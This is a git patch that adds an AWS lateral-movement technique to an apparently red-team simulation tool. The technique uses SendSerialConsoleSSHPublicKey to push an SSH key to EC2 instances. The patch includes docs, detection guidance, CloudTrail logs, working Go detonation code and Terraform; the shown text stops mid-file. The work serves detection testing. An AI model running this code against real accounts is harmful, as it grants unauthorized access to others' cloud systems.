From a912e7fc2a0bb03a9d4ed813fae7cc67c74d5d21 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Adan=20=C3=81lvarez?= Date: Thu, 28 Nov 2024 14:00:26 +0100 Subject: [PATCH] New attack technique: Usage of SendSerialConsoleSSHPublicKey on multiple instances (#599) * add ec2-send-serial-console-ssh-public-key technique * add ec2-send-serial-console-ssh-public-key docs * fix cloudtrail example * keep ec2 serial console access as it was * Sort imports * Fix potential nil pointer dereference and improve logging * Move enabling/disabling SendSerielConsoleSSHKey to Terraform * Cosmetic improvements and update docs * Change logic for handling initial serial console enablement * Remove unused variable --------- Co-authored-by: Christophe Tafani-Dereeper --- ....ec2-serial-console-send-ssh-public-key.md | 277 ++++++++++++++++++ docs/attack-techniques/AWS/index.md | 2 + docs/attack-techniques/list.md | 1 + ...c2-serial-console-send-ssh-public-key.json | 209 +++++++++++++ docs/index.yaml | 7 + .../main.go | 128 ++++++++ .../main.tf | 135 +++++++++ .../my_key.pub | 1 + v2/internal/attacktechniques/main.go | 3 +- 9 files changed, 762 insertions(+), 1 deletion(-) create mode 100755 docs/attack-techniques/AWS/aws.lateral-movement.ec2-serial-console-send-ssh-public-key.md create mode 100644 docs/detonation-logs/aws.lateral-movement.ec2-serial-console-send-ssh-public-key.json create mode 100644 v2/internal/attacktechniques/aws/lateral-movement/ec2-send-serial-console-send-ssh-public-key/main.go create mode 100644 v2/internal/attacktechniques/aws/lateral-movement/ec2-send-serial-console-send-ssh-public-key/main.tf create mode 100644 v2/internal/attacktechniques/aws/lateral-movement/ec2-send-serial-console-send-ssh-public-key/my_key.pub diff --git a/docs/attack-techniques/AWS/aws.lateral-movement.ec2-serial-console-send-ssh-public-key.md b/docs/attack-techniques/AWS/aws.lateral-movement.ec2-serial-console-send-ssh-public-key.md new file mode 100755 index 000000000..c71b85653 --- /dev/null +++ b/docs/attack-techniques/AWS/aws.lateral-movement.ec2-serial-console-send-ssh-public-key.md @@ -0,0 +1,277 @@ +--- +title: Usage of EC2 Serial Console to push SSH public key +--- + +# Usage of EC2 Serial Console to push SSH public key + + slow + idempotent + +Platform: AWS + +## MITRE ATT&CK Tactics + + +- Lateral Movement + +## Description + + +Simulates an attacker using EC2 Instance Connect to push an SSH public key to multiple EC2 instances, using SendSerialConsoleSSHPublicKey. This allows anyone +with the corresponding private key to connect directly to the systems via SSH, assuming they have appropriate network connectivity. + +Warm-up: + +- Create multiple EC2 instances and a VPC (takes a few minutes). + +Detonation: + +- Adds a public SSH key to the EC2 instances using SendSerialConsoleSSHPublicKey. + +References: + +- https://docs.aws.amazon.com/ec2-instance-connect/latest/APIReference/API_SendSerialConsoleSSHPublicKey.html +- https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud +- https://fwdcloudsec.org/assets/presentations/2024/europe/sebastian-walla-cloud-conscious-tactics-techniques-and-procedures-an-overview.pdf +- https://unit42.paloaltonetworks.com/cloud-lateral-movement-techniques/ +- https://unit42.paloaltonetworks.com/cloud-virtual-machine-attack-vectors/ + + +## Instructions + +```bash title="Detonate with Stratus Red Team" +stratus detonate aws.lateral-movement.ec2-serial-console-send-ssh-public-key +``` +## Detection + + +Identify, through CloudTrail's SendSerialConsoleSSHPublicKey event, when a user is adding an SSH key to EC2 instances. + + + +## Detonation logs new! + +The following CloudTrail events are generated when this technique is detonated[^1]: + + +- `ec2-instance-connect:SendSerialConsoleSSHPublicKey` + +- `ec2:EnableSerialConsoleAccess` + + +??? "View raw detonation logs" + + ```json hl_lines="6 57 109 161" + + [ + { + "awsRegion": "cniso-east-3r", + "eventCategory": "Management", + "eventID": "37ba412b-f943-44f2-ae48-4527f6e789d9", + "eventName": "EnableSerialConsoleAccess", + "eventSource": "ec2.amazonaws.com", + "eventTime": "2024-11-26T15:35:22Z", + "eventType": "AwsApiCall", + "eventVersion": "1.10", + "managementEvent": true, + "readOnly": false, + "recipientAccountId": "844015365555", + "requestID": "e110338f-cc06-4284-bf16-6528a7df1561", + "requestParameters": { + "EnableSerialConsoleAccessRequest": "" + }, + "responseElements": { + "EnableSerialConsoleAccessResponse": { + "requestId": "e110338f-cc06-4284-bf16-6528a7df1561", + "serialConsoleAccessEnabled": true, + "xmlns": "http://ec2.amazonaws.com/doc/2016-11-15/" + } + }, + "sourceIPAddress": "201.252.42.03", + "tlsDetails": { + "cipherSuite": "TLS_AES_128_GCM_SHA256", + "clientProvidedHostHeader": "ec2.cniso-east-3r.amazonaws.com", + "tlsVersion": "TLSv1.3" + }, + "userAgent": "stratus-red-team_b0fedc91-bd4a-4ba1-a776-80e707fef2a0", + "userIdentity": { + "accessKeyId": "ASIA2HJRQF0DHNYEE9N1", + "accountId": "844015365555", + "arn": "arn:aws:sts::844015365555:assumed-role/AWSReservedSSOrandoml3I7nL6f7BmB@gmail.com", + "principalId": "AROAEMHZD694LU95MUYOP:randomca0L529zwNAY@gmail.com", + "sessionContext": { + "attributes": { + "creationDate": "2024-11-26T15:14:58Z", + "mfaAuthenticated": "false" + }, + "sessionIssuer": { + "accountId": "844015365555", + "arn": "arn:aws:iam::844015365555:role/aws-reserved/sso.amazonaws.com/AWSReservedSSO_account-admin_599c9e90e350d2ff", + "principalId": "AROAEMHZD694LU95MUYOP", + "type": "Role", + "userName": "AWSReservedSSO_account-admin_599c9e90e350d2ff" + } + }, + "type": "AssumedRole" + } + }, + { + "awsRegion": "cniso-east-3r", + "eventCategory": "Management", + "eventID": "787b2464-f27b-4d4c-91bc-6396f2297d0e", + "eventName": "SendSerialConsoleSSHPublicKey", + "eventSource": "ec2-instance-connect.amazonaws.com", + "eventTime": "2024-11-26T15:35:23Z", + "eventType": "AwsApiCall", + "eventVersion": "1.08", + "managementEvent": true, + "readOnly": false, + "recipientAccountId": "844015365555", + "requestID": "c74b1e77-bc91-4174-b297-d06a71c89abf", + "requestParameters": { + "instanceId": "i-EFCb4e480CAbc4CF9", + "monitorMode": false, + "sSHPublicKey": "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtAlK45MAEWZ7MUY2QEmi3M6W+peGL3VCrc0qH54xRu", + "serialPort": 0 + }, + "responseElements": { + "requestId": "c74b1e77-bc91-4174-b297-d06a71c89abf", + "success": true + }, + "sourceIPAddress": "201.252.42.03", + "tlsDetails": { + "cipherSuite": "TLS_AES_128_GCM_SHA256", + "clientProvidedHostHeader": "ec2-instance-connect.cniso-east-3r.amazonaws.com", + "tlsVersion": "TLSv1.3" + }, + "userAgent": "stratus-red-team_b0fedc91-bd4a-4ba1-a776-80e707fef2a0", + "userIdentity": { + "accessKeyId": "ASIA2HJRQF0DHNYEE9N1", + "accountId": "844015365555", + "arn": "arn:aws:sts::844015365555:assumed-role/AWSReservedSSOrandoml3I7nL6f7BmB@gmail.com", + "principalId": "AROAEMHZD694LU95MUYOP:randomca0L529zwNAY@gmail.com", + "sessionContext": { + "attributes": { + "creationDate": "2024-11-26T15:14:58Z", + "mfaAuthenticated": "false" + }, + "sessionIssuer": { + "accountId": "844015365555", + "arn": "arn:aws:iam::844015365555:role/aws-reserved/sso.amazonaws.com/AWSReservedSSO_account-admin_599c9e90e350d2ff", + "principalId": "AROAEMHZD694LU95MUYOP", + "type": "Role", + "userName": "AWSReservedSSO_account-admin_599c9e90e350d2ff" + }, + "webIdFederationData": {} + }, + "type": "AssumedRole" + } + }, + { + "awsRegion": "cniso-east-3r", + "eventCategory": "Management", + "eventID": "e49972cb-b394-43e2-aab5-602f1fb56f85", + "eventName": "SendSerialConsoleSSHPublicKey", + "eventSource": "ec2-instance-connect.amazonaws.com", + "eventTime": "2024-11-26T15:35:23Z", + "eventType": "AwsApiCall", + "eventVersion": "1.08", + "managementEvent": true, + "readOnly": false, + "recipientAccountId": "844015365555", + "requestID": "d392c0ca-351f-472f-9ca3-b411beb9df9c", + "requestParameters": { + "instanceId": "i-B2ABDCa5b78E0f1dd", + "monitorMode": false, + "sSHPublicKey": "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtAlK45MAEWZ7MUY2QEmi3M6W+peGL3VCrc0qH54xRu", + "serialPort": 0 + }, + "responseElements": { + "requestId": "d392c0ca-351f-472f-9ca3-b411beb9df9c", + "success": true + }, + "sourceIPAddress": "201.252.42.03", + "tlsDetails": { + "cipherSuite": "TLS_AES_128_GCM_SHA256", + "clientProvidedHostHeader": "ec2-instance-connect.cniso-east-3r.amazonaws.com", + "tlsVersion": "TLSv1.3" + }, + "userAgent": "stratus-red-team_b0fedc91-bd4a-4ba1-a776-80e707fef2a0", + "userIdentity": { + "accessKeyId": "ASIA2HJRQF0DHNYEE9N1", + "accountId": "844015365555", + "arn": "arn:aws:sts::844015365555:assumed-role/AWSReservedSSOrandoml3I7nL6f7BmB@gmail.com", + "principalId": "AROAEMHZD694LU95MUYOP:randomca0L529zwNAY@gmail.com", + "sessionContext": { + "attributes": { + "creationDate": "2024-11-26T15:14:58Z", + "mfaAuthenticated": "false" + }, + "sessionIssuer": { + "accountId": "844015365555", + "arn": "arn:aws:iam::844015365555:role/aws-reserved/sso.amazonaws.com/AWSReservedSSO_account-admin_599c9e90e350d2ff", + "principalId": "AROAEMHZD694LU95MUYOP", + "type": "Role", + "userName": "AWSReservedSSO_account-admin_599c9e90e350d2ff" + }, + "webIdFederationData": {} + }, + "type": "AssumedRole" + } + }, + { + "awsRegion": "cniso-east-3r", + "eventCategory": "Management", + "eventID": "f4dc86c9-6b22-4643-a0e8-fcb97fcfae68", + "eventName": "SendSerialConsoleSSHPublicKey", + "eventSource": "ec2-instance-connect.amazonaws.com", + "eventTime": "2024-11-26T15:35:22Z", + "eventType": "AwsApiCall", + "eventVersion": "1.08", + "managementEvent": true, + "readOnly": false, + "recipientAccountId": "844015365555", + "requestID": "88c8e41e-7754-4377-983f-140f8ca5617e", + "requestParameters": { + "instanceId": "i-D46eD8FCdefED5aAE", + "monitorMode": false, + "sSHPublicKey": "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtAlK45MAEWZ7MUY2QEmi3M6W+peGL3VCrc0qH54xRu", + "serialPort": 0 + }, + "responseElements": { + "requestId": "88c8e41e-7754-4377-983f-140f8ca5617e", + "success": true + }, + "sourceIPAddress": "201.252.42.03", + "tlsDetails": { + "cipherSuite": "TLS_AES_128_GCM_SHA256", + "clientProvidedHostHeader": "ec2-instance-connect.cniso-east-3r.amazonaws.com", + "tlsVersion": "TLSv1.3" + }, + "userAgent": "stratus-red-team_b0fedc91-bd4a-4ba1-a776-80e707fef2a0", + "userIdentity": { + "accessKeyId": "ASIA2HJRQF0DHNYEE9N1", + "accountId": "844015365555", + "arn": "arn:aws:sts::844015365555:assumed-role/AWSReservedSSOrandoml3I7nL6f7BmB@gmail.com", + "principalId": "AROAEMHZD694LU95MUYOP:randomca0L529zwNAY@gmail.com", + "sessionContext": { + "attributes": { + "creationDate": "2024-11-26T15:14:58Z", + "mfaAuthenticated": "false" + }, + "sessionIssuer": { + "accountId": "844015365555", + "arn": "arn:aws:iam::844015365555:role/aws-reserved/sso.amazonaws.com/AWSReservedSSO_account-admin_599c9e90e350d2ff", + "principalId": "AROAEMHZD694LU95MUYOP", + "type": "Role", + "userName": "AWSReservedSSO_account-admin_599c9e90e350d2ff" + }, + "webIdFederationData": {} + }, + "type": "AssumedRole" + } + } + ] + ``` + +[^1]: These logs have been gathered from a real detonation of this technique in a test environment using [Grimoire](https://github.com/DataDog/grimoire), and anonymized using [LogLicker](https://github.com/Permiso-io-tools/LogLicker). diff --git a/docs/attack-techniques/AWS/index.md b/docs/attack-techniques/AWS/index.md index a66dc9d56..5145dee15 100755 --- a/docs/attack-techniques/AWS/index.md +++ b/docs/attack-techniques/AWS/index.md @@ -85,6 +85,8 @@ Note that some Stratus attack techniques may correspond to more than a single AT ## Lateral Movement +- [Usage of EC2 Serial Console to push SSH public key](./aws.lateral-movement.ec2-serial-console-send-ssh-public-key.md) + - [Usage of EC2 Instance Connect on multiple instances](./aws.lateral-movement.ec2-instance-connect.md) diff --git a/docs/attack-techniques/list.md b/docs/attack-techniques/list.md index be75c57b8..40d1f63e9 100755 --- a/docs/attack-techniques/list.md +++ b/docs/attack-techniques/list.md @@ -38,6 +38,7 @@ This page contains the list of all Stratus Attack Techniques. | [S3 Ransomware through client-side encryption](./AWS/aws.impact.s3-ransomware-client-side-encryption.md) | [AWS](./AWS/index.md) | Impact | | [S3 Ransomware through individual file deletion](./AWS/aws.impact.s3-ransomware-individual-deletion.md) | [AWS](./AWS/index.md) | Impact | | [Console Login without MFA](./AWS/aws.initial-access.console-login-without-mfa.md) | [AWS](./AWS/index.md) | Initial Access | +| [Usage of EC2 Serial Console to push SSH public key](./AWS/aws.lateral-movement.ec2-serial-console-send-ssh-public-key.md) | [AWS](./AWS/index.md) | Lateral Movement | | [Usage of EC2 Instance Connect on multiple instances](./AWS/aws.lateral-movement.ec2-instance-connect.md) | [AWS](./AWS/index.md) | Lateral Movement | | [Backdoor an IAM Role](./AWS/aws.persistence.iam-backdoor-role.md) | [AWS](./AWS/index.md) | Persistence | | [Create an Access Key on an IAM User](./AWS/aws.persistence.iam-backdoor-user.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation | diff --git a/docs/detonation-logs/aws.lateral-movement.ec2-serial-console-send-ssh-public-key.json b/docs/detonation-logs/aws.lateral-movement.ec2-serial-console-send-ssh-public-key.json new file mode 100644 index 000000000..2fa0ce237 --- /dev/null +++ b/docs/detonation-logs/aws.lateral-movement.ec2-serial-console-send-ssh-public-key.json @@ -0,0 +1,209 @@ +[ + { + "awsRegion": "cniso-east-3r", + "eventCategory": "Management", + "eventID": "37ba412b-f943-44f2-ae48-4527f6e789d9", + "eventName": "EnableSerialConsoleAccess", + "eventSource": "ec2.amazonaws.com", + "eventTime": "2024-11-26T15:35:22Z", + "eventType": "AwsApiCall", + "eventVersion": "1.10", + "managementEvent": true, + "readOnly": false, + "recipientAccountId": "844015365555", + "requestID": "e110338f-cc06-4284-bf16-6528a7df1561", + "requestParameters": { + "EnableSerialConsoleAccessRequest": "" + }, + "responseElements": { + "EnableSerialConsoleAccessResponse": { + "requestId": "e110338f-cc06-4284-bf16-6528a7df1561", + "serialConsoleAccessEnabled": true, + "xmlns": "http://ec2.amazonaws.com/doc/2016-11-15/" + } + }, + "sourceIPAddress": "201.252.42.03", + "tlsDetails": { + "cipherSuite": "TLS_AES_128_GCM_SHA256", + "clientProvidedHostHeader": "ec2.cniso-east-3r.amazonaws.com", + "tlsVersion": "TLSv1.3" + }, + "userAgent": "stratus-red-team_b0fedc91-bd4a-4ba1-a776-80e707fef2a0", + "userIdentity": { + "accessKeyId": "ASIA2HJRQF0DHNYEE9N1", + "accountId": "844015365555", + "arn": "arn:aws:sts::844015365555:assumed-role/AWSReservedSSOrandoml3I7nL6f7BmB@gmail.com", + "principalId": "AROAEMHZD694LU95MUYOP:randomca0L529zwNAY@gmail.com", + "sessionContext": { + "attributes": { + "creationDate": "2024-11-26T15:14:58Z", + "mfaAuthenticated": "false" + }, + "sessionIssuer": { + "accountId": "844015365555", + "arn": "arn:aws:iam::844015365555:role/aws-reserved/sso.amazonaws.com/AWSReservedSSO_account-admin_599c9e90e350d2ff", + "principalId": "AROAEMHZD694LU95MUYOP", + "type": "Role", + "userName": "AWSReservedSSO_account-admin_599c9e90e350d2ff" + } + }, + "type": "AssumedRole" + } + }, + { + "awsRegion": "cniso-east-3r", + "eventCategory": "Management", + "eventID": "787b2464-f27b-4d4c-91bc-6396f2297d0e", + "eventName": "SendSerialConsoleSSHPublicKey", + "eventSource": "ec2-instance-connect.amazonaws.com", + "eventTime": "2024-11-26T15:35:23Z", + "eventType": "AwsApiCall", + "eventVersion": "1.08", + "managementEvent": true, + "readOnly": false, + "recipientAccountId": "844015365555", + "requestID": "c74b1e77-bc91-4174-b297-d06a71c89abf", + "requestParameters": { + "instanceId": "i-EFCb4e480CAbc4CF9", + "monitorMode": false, + "sSHPublicKey": "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtAlK45MAEWZ7MUY2QEmi3M6W+peGL3VCrc0qH54xRu", + "serialPort": 0 + }, + "responseElements": { + "requestId": "c74b1e77-bc91-4174-b297-d06a71c89abf", + "success": true + }, + "sourceIPAddress": "201.252.42.03", + "tlsDetails": { + "cipherSuite": "TLS_AES_128_GCM_SHA256", + "clientProvidedHostHeader": "ec2-instance-connect.cniso-east-3r.amazonaws.com", + "tlsVersion": "TLSv1.3" + }, + "userAgent": "stratus-red-team_b0fedc91-bd4a-4ba1-a776-80e707fef2a0", + "userIdentity": { + "accessKeyId": "ASIA2HJRQF0DHNYEE9N1", + "accountId": "844015365555", + "arn": "arn:aws:sts::844015365555:assumed-role/AWSReservedSSOrandoml3I7nL6f7BmB@gmail.com", + "principalId": "AROAEMHZD694LU95MUYOP:randomca0L529zwNAY@gmail.com", + "sessionContext": { + "attributes": { + "creationDate": "2024-11-26T15:14:58Z", + "mfaAuthenticated": "false" + }, + "sessionIssuer": { + "accountId": "844015365555", + "arn": "arn:aws:iam::844015365555:role/aws-reserved/sso.amazonaws.com/AWSReservedSSO_account-admin_599c9e90e350d2ff", + "principalId": "AROAEMHZD694LU95MUYOP", + "type": "Role", + "userName": "AWSReservedSSO_account-admin_599c9e90e350d2ff" + }, + "webIdFederationData": {} + }, + "type": "AssumedRole" + } + }, + { + "awsRegion": "cniso-east-3r", + "eventCategory": "Management", + "eventID": "e49972cb-b394-43e2-aab5-602f1fb56f85", + "eventName": "SendSerialConsoleSSHPublicKey", + "eventSource": "ec2-instance-connect.amazonaws.com", + "eventTime": "2024-11-26T15:35:23Z", + "eventType": "AwsApiCall", + "eventVersion": "1.08", + "managementEvent": true, + "readOnly": false, + "recipientAccountId": "844015365555", + "requestID": "d392c0ca-351f-472f-9ca3-b411beb9df9c", + "requestParameters": { + "instanceId": "i-B2ABDCa5b78E0f1dd", + "monitorMode": false, + "sSHPublicKey": "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtAlK45MAEWZ7MUY2QEmi3M6W+peGL3VCrc0qH54xRu", + "serialPort": 0 + }, + "responseElements": { + "requestId": "d392c0ca-351f-472f-9ca3-b411beb9df9c", + "success": true + }, + "sourceIPAddress": "201.252.42.03", + "tlsDetails": { + "cipherSuite": "TLS_AES_128_GCM_SHA256", + "clientProvidedHostHeader": "ec2-instance-connect.cniso-east-3r.amazonaws.com", + "tlsVersion": "TLSv1.3" + }, + "userAgent": "stratus-red-team_b0fedc91-bd4a-4ba1-a776-80e707fef2a0", + "userIdentity": { + "accessKeyId": "ASIA2HJRQF0DHNYEE9N1", + "accountId": "844015365555", + "arn": "arn:aws:sts::844015365555:assumed-role/AWSReservedSSOrandoml3I7nL6f7BmB@gmail.com", + "principalId": "AROAEMHZD694LU95MUYOP:randomca0L529zwNAY@gmail.com", + "sessionContext": { + "attributes": { + "creationDate": "2024-11-26T15:14:58Z", + "mfaAuthenticated": "false" + }, + "sessionIssuer": { + "accountId": "844015365555", + "arn": "arn:aws:iam::844015365555:role/aws-reserved/sso.amazonaws.com/AWSReservedSSO_account-admin_599c9e90e350d2ff", + "principalId": "AROAEMHZD694LU95MUYOP", + "type": "Role", + "userName": "AWSReservedSSO_account-admin_599c9e90e350d2ff" + }, + "webIdFederationData": {} + }, + "type": "AssumedRole" + } + }, + { + "awsRegion": "cniso-east-3r", + "eventCategory": "Management", + "eventID": "f4dc86c9-6b22-4643-a0e8-fcb97fcfae68", + "eventName": "SendSerialConsoleSSHPublicKey", + "eventSource": "ec2-instance-connect.amazonaws.com", + "eventTime": "2024-11-26T15:35:22Z", + "eventType": "AwsApiCall", + "eventVersion": "1.08", + "managementEvent": true, + "readOnly": false, + "recipientAccountId": "844015365555", + "requestID": "88c8e41e-7754-4377-983f-140f8ca5617e", + "requestParameters": { + "instanceId": "i-D46eD8FCdefED5aAE", + "monitorMode": false, + "sSHPublicKey": "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtAlK45MAEWZ7MUY2QEmi3M6W+peGL3VCrc0qH54xRu", + "serialPort": 0 + }, + "responseElements": { + "requestId": "88c8e41e-7754-4377-983f-140f8ca5617e", + "success": true + }, + "sourceIPAddress": "201.252.42.03", + "tlsDetails": { + "cipherSuite": "TLS_AES_128_GCM_SHA256", + "clientProvidedHostHeader": "ec2-instance-connect.cniso-east-3r.amazonaws.com", + "tlsVersion": "TLSv1.3" + }, + "userAgent": "stratus-red-team_b0fedc91-bd4a-4ba1-a776-80e707fef2a0", + "userIdentity": { + "accessKeyId": "ASIA2HJRQF0DHNYEE9N1", + "accountId": "844015365555", + "arn": "arn:aws:sts::844015365555:assumed-role/AWSReservedSSOrandoml3I7nL6f7BmB@gmail.com", + "principalId": "AROAEMHZD694LU95MUYOP:randomca0L529zwNAY@gmail.com", + "sessionContext": { + "attributes": { + "creationDate": "2024-11-26T15:14:58Z", + "mfaAuthenticated": "false" + }, + "sessionIssuer": { + "accountId": "844015365555", + "arn": "arn:aws:iam::844015365555:role/aws-reserved/sso.amazonaws.com/AWSReservedSSO_account-admin_599c9e90e350d2ff", + "principalId": "AROAEMHZD694LU95MUYOP", + "type": "Role", + "userName": "AWSReservedSSO_account-admin_599c9e90e350d2ff" + }, + "webIdFederationData": {} + }, + "type": "AssumedRole" + } + } +] \ No newline at end of file diff --git a/docs/index.yaml b/docs/index.yaml index e87c594ab..5779854d3 100644 --- a/docs/index.yaml +++ b/docs/index.yaml @@ -211,6 +211,13 @@ AWS: platform: AWS isIdempotent: true Lateral Movement: + - id: aws.lateral-movement.ec2-serial-console-send-ssh-public-key + name: Usage of EC2 Serial Console to push SSH public key + isSlow: true + mitreAttackTactics: + - Lateral Movement + platform: AWS + isIdempotent: true - id: aws.lateral-movement.ec2-instance-connect name: Usage of EC2 Instance Connect on multiple instances isSlow: true diff --git a/v2/internal/attacktechniques/aws/lateral-movement/ec2-send-serial-console-send-ssh-public-key/main.go b/v2/internal/attacktechniques/aws/lateral-movement/ec2-send-serial-console-send-ssh-public-key/main.go new file mode 100644 index 000000000..91daa0a39 --- /dev/null +++ b/v2/internal/attacktechniques/aws/lateral-movement/ec2-send-serial-console-send-ssh-public-key/main.go @@ -0,0 +1,128 @@ +package aws + +import ( + "context" + _ "embed" + "fmt" + "github.com/aws/aws-sdk-go-v2/service/ec2" + "github.com/aws/aws-sdk-go-v2/service/ec2instanceconnect" + "github.com/datadog/stratus-red-team/v2/pkg/stratus" + "github.com/datadog/stratus-red-team/v2/pkg/stratus/mitreattack" + "log" + "strconv" + "strings" + "time" +) + +//go:embed my_key.pub +var publicSSHKey string + +//go:embed main.tf +var tf []byte + +func init() { + stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{ + ID: "aws.lateral-movement.ec2-serial-console-send-ssh-public-key", + FriendlyName: "Usage of EC2 Serial Console to push SSH public key", + IsSlow: true, + Description: ` +Simulates an attacker using EC2 Instance Connect to push an SSH public key to multiple EC2 instances, using SendSerialConsoleSSHPublicKey. This allows anyone +with the corresponding private key to connect directly to the systems via SSH, assuming they have appropriate network connectivity. + +Warm-up: + +- Create multiple EC2 instances and a VPC (takes a few minutes). + +Detonation: + +- Adds a public SSH key to the EC2 instances using SendSerialConsoleSSHPublicKey. + +References: + +- https://docs.aws.amazon.com/ec2-instance-connect/latest/APIReference/API_SendSerialConsoleSSHPublicKey.html +- https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud +- https://fwdcloudsec.org/assets/presentations/2024/europe/sebastian-walla-cloud-conscious-tactics-techniques-and-procedures-an-overview.pdf +- https://unit42.paloaltonetworks.com/cloud-lateral-movement-techniques/ +- https://unit42.paloaltonetworks.com/cloud-virtual-machine-attack-vectors/ +`, + Detection: ` +Identify, through CloudTrail's SendSerialConsoleSSHPublicKey event, when a user is adding an SSH key to EC2 instances. +`, + Platform: stratus.AWS, + PrerequisitesTerraformCode: tf, + IsIdempotent: true, + MitreAttackTactics: []mitreattack.Tactic{mitreattack.LateralMovement}, + Detonate: detonate, + Revert: revert, + }) +} + +func detonate(params map[string]string, providers stratus.CloudProviders) error { + ec2Client := ec2.NewFromConfig(providers.AWS().GetConnection()) + ec2instanceconnectClient := ec2instanceconnect.NewFromConfig(providers.AWS().GetConnection()) + instanceIDs := strings.Split(params["instance_ids"], ",") + + // Enable serial console access + log.Println("Enabling serial console access at the region level") + if err := setSerialConsoleEnabled(ec2Client, true); err != nil { + return fmt.Errorf("failed to disable serial console access: %v", err) + } + + log.Println("Sending SSH public key to " + strconv.Itoa(len(instanceIDs)) + " EC2 instances via serial console") + for _, instanceID := range instanceIDs { + cleanInstanceID := strings.Trim(instanceID, " \"\n\r") + err := sendSerialConsoleSSHPublicKey(ec2instanceconnectClient, cleanInstanceID, publicSSHKey) + if err != nil { + if strings.Contains(err.Error(), "SerialConsoleSessionLimitExceededException") { + log.Printf("Serial console session limit exceeded for instance %s. Retrying after waiting 60s...", cleanInstanceID) + time.Sleep(60 * time.Second) + err = sendSerialConsoleSSHPublicKey(ec2instanceconnectClient, cleanInstanceID, publicSSHKey) + } + if err != nil { + return fmt.Errorf("failed to send SSH public key via serial console to instance %s: %v", cleanInstanceID, err) + } + } + + log.Printf("SSH public key successfully added to instance %s via serial console", cleanInstanceID) + } + + return nil +} + +func revert(params map[string]string, providers stratus.CloudProviders) error { + // Serial console access was already enabled before running Stratus Red Team. Nothing to do + if params["serial_console_access_initial_value"] == "true" { + log.Println("Serial console access was already enabled before running Stratus Red Team. Keeping it enabled") + return nil + } + + // Serial console access was disabled before running Stratus Red Team. Since the detonation enabled it, + // and it's a region-wide setting, we now need to revert it back to its original value (false) + ec2Client := ec2.NewFromConfig(providers.AWS().GetConnection()) + log.Println("Serial console access was disabled before running Stratus Red Team. Disabling it again.") + if err := setSerialConsoleEnabled(ec2Client, false); err != nil { + return fmt.Errorf("failed to disable serial console access: %v", err) + } + + return nil +} + +// Utility functions +func sendSerialConsoleSSHPublicKey(ec2instanceconnectClient *ec2instanceconnect.Client, instanceId string, sshPublicKey string) error { + _, err := ec2instanceconnectClient.SendSerialConsoleSSHPublicKey(context.Background(), &ec2instanceconnect.SendSerialConsoleSSHPublicKeyInput{ + InstanceId: &instanceId, + SSHPublicKey: &sshPublicKey, + }) + + return err +} + +func setSerialConsoleEnabled(ec2Client *ec2.Client, enabled bool) error { + if enabled { + _, err := ec2Client.EnableSerialConsoleAccess(context.Background(), &ec2.EnableSerialConsoleAccessInput{}) + return err + } else { + _, err := ec2Client.DisableSerialConsoleAccess(context.Background(), &ec2.DisableSerialConsoleAccessInput{}) + return err + } +} diff --git a/v2/internal/attacktechniques/aws/lateral-movement/ec2-send-serial-console-send-ssh-public-key/main.tf b/v2/internal/attacktechniques/aws/lateral-movement/ec2-send-serial-console-send-ssh-public-key/main.tf new file mode 100644 index 000000000..4a5ea099b --- /dev/null +++ b/v2/internal/attacktechniques/aws/lateral-movement/ec2-send-serial-console-send-ssh-public-key/main.tf @@ -0,0 +1,135 @@ +terraform { + required_providers { + aws = { + source = "hashicorp/aws" + version = "~> 4.0" + } + } +} + +provider "aws" { + skip_region_validation = true + skip_credentials_validation = true + default_tags { + tags = { + StratusRedTeam = true + } + } +} + +locals { + resource_prefix = "stratus-red-team-ec2-serialconsole-ssh-lateral-movement" +} + +variable "instance_count" { + description = "Number of instances to create" + default = 3 +} + +data "aws_availability_zones" "available" { + state = "available" +} + +data "aws_ec2_serial_console_access" "current" {} + +module "vpc" { + source = "terraform-aws-modules/vpc/aws" + version = "~> 3.0" + + name = "${local.resource_prefix}-vpc" + cidr = "10.0.0.0/16" + + azs = [data.aws_availability_zones.available.names[0]] + private_subnets = ["10.0.1.0/24"] + public_subnets = ["10.0.128.0/24"] + + map_public_ip_on_launch = false + enable_nat_gateway = true + + tags = { + StratusRedTeam = true + } +} + +data "aws_ami" "amazon-2" { + most_recent = true + + filter { + name = "name" + values = ["amzn2-ami-hvm-*-x86_64-ebs"] + } + owners = ["amazon"] +} + +resource "aws_network_interface" "iface" { + count = var.instance_count + subnet_id = module.vpc.private_subnets[0] + + private_ips = [format("10.0.1.%d", count.index + 10)] +} + +resource "aws_iam_role" "instance-role" { + name = "${local.resource_prefix}-role" + path = "/" + + assume_role_policy = <